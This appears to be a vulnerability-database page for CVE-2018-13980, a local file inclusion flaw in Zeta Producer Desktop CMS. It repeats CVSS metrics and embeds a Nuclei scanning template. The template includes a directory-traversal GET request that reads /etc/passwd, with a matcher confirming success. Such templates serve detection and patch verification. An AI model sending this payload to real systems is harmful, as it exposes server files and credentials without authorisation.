Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-13980
HistoryOct 18, 2021 - 1:00 p.m.

Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion

2021-10-1813:00:57
ProjectDiscovery
github.com
5
cve2018
lfi
edb
packetstorm
zeta-producer

CVSS2

2.1

Attack Vector

LOCAL

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:L/AC:L/Au:N/C:P/I:N/A:N

CVSS3

5.5

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

EPSS

0.001

Percentile

47.9%

Zeta Producer Desktop CMS before 14.2.1 is vulnerable to local file inclusion if the plugin “filebrowser” is installed because of assets/php/filebrowser/filebrowser.main.php?file=…/ directory traversal.

id: CVE-2018-13980

info:
  name: Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion
  author: wisnupramoedya
  severity: medium
  description: Zeta Producer Desktop CMS before 14.2.1 is vulnerable to local file inclusion if the plugin "filebrowser" is installed because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
    Upgrade Zeta Producer Desktop CMS to version 14.2.1 or later to mitigate the vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/45016
    - https://www.sec-consult.com/en/blog/advisories/remote-code-execution-local-file-disclosure-zeta-producer-desktop-cms/
    - http://packetstormsecurity.com/files/148537/Zeta-Producer-Desktop-CMS-14.2.0-Code-Execution-File-Disclosure.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-13980
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.5
    cve-id: CVE-2018-13980
    cwe-id: CWE-22
    epss-score: 0.0018
    epss-percentile: 0.55107
    cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zeta-producer
    product: zeta_producer
  tags: cve2018,cve,lfi,edb,packetstorm,zeta-producer

http:
  - method: GET
    path:
      - "{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402203224fda196eb1cbc81b68a79d58afaed6d9d7d9c8821fbcc463a6bc0e7295ad4022059cbe8295c4346847a37bf4a6db45ed614ead696931c35f803ddd046ee3c3c17:922c64590222798bb761d5b6d8e72950

CVSS2

2.1

Attack Vector

LOCAL

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:L/AC:L/Au:N/C:P/I:N/A:N

CVSS3

5.5

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

EPSS

0.001

Percentile

47.9%